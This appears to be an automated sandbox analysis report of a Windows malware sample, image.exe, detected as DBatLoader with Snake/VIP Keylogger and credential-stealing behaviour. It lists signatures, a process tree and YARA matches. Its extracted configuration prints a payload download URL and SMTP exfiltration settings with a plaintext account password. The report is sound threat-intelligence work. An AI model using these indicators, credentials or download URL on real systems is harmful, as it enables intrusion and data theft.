Edit tour

Windows Analysis Report
image.exe

Overview

General Information

Sample name:	image.exe
Analysis ID:	1583390
MD5:	4f481037138109f314141b4fede21f87
SHA1:	e28504f330d3d8586d36e3ff270fdfc0821e0cc2
SHA256:	f65d5f51c5b69891d73c3799b4ed4d53fea665a6ef5b3d0cce8cae1e96c0e785
Tags:	downloaderexemalwaretrojanuser-Joker
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Allocates many large memory junks

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files with a suspicious file extension

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Program Location with Network Connections

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

image.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\image.exe" MD5: 4F481037138109F314141B4FEDE21F87)

cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nhpoymuP.pif (PID: 7416 cmdline: C:\Users\Public\Libraries\nhpoymuP.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Pumyophn.PIF (PID: 7584 cmdline: "C:\Users\Public\Libraries\Pumyophn.PIF" MD5: 4F481037138109F314141B4FEDE21F87)

cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nhpoymuP.pif (PID: 7688 cmdline: C:\Users\Public\Libraries\nhpoymuP.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Pumyophn.PIF (PID: 7912 cmdline: "C:\Users\Public\Libraries\Pumyophn.PIF" MD5: 4F481037138109F314141B4FEDE21F87)

cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nhpoymuP.pif (PID: 8008 cmdline: C:\Users\Public\Libraries\nhpoymuP.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://fodoknotel.za.com/233_Pumyophnrer"]}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1714114145.0000000002406000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.2964961500.0000000026094000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
00000000.00000003.1679035138.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3fcda:$a1: get_encryptedPassword 0x97c12:$a1: get_encryptedPassword 0x3fcae:$a2: get_encryptedUsername 0x97be6:$a2: get_encryptedUsername 0x3fd72:$a3: get_timePasswordChanged 0x97caa:$a3: get_timePasswordChanged 0x3fc8a:$a4: get_passwordField 0x97bc2:$a4: get_passwordField 0x3fcf0:$a5: set_encryptedPassword 0x97c28:$a5: set_encryptedPassword 0x3fabd:$a7: get_logins 0x979f5:$a7: get_logins 0x3b10a:$a10: KeyLoggerEventArgs 0x93042:$a10: KeyLoggerEventArgs 0x3b0d9:$a11: KeyLoggerEventArgsEventHandler 0x93011:$a11: KeyLoggerEventArgsEventHandler 0x3fb91:$a13: _encryptedPassword 0x97ac9:$a13: _encryptedPassword
00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea9a:$a1: get_encryptedPassword 0x3ea6e:$a2: get_encryptedUsername 0x3eb32:$a3: get_timePasswordChanged 0x3ea4a:$a4: get_passwordField 0x3eab0:$a5: set_encryptedPassword 0x3e87d:$a7: get_logins 0x39eca:$a10: KeyLoggerEventArgs 0x39e99:$a11: KeyLoggerEventArgsEventHandler 0x3e951:$a13: _encryptedPassword
0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
00000007.00000002.2945818229.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
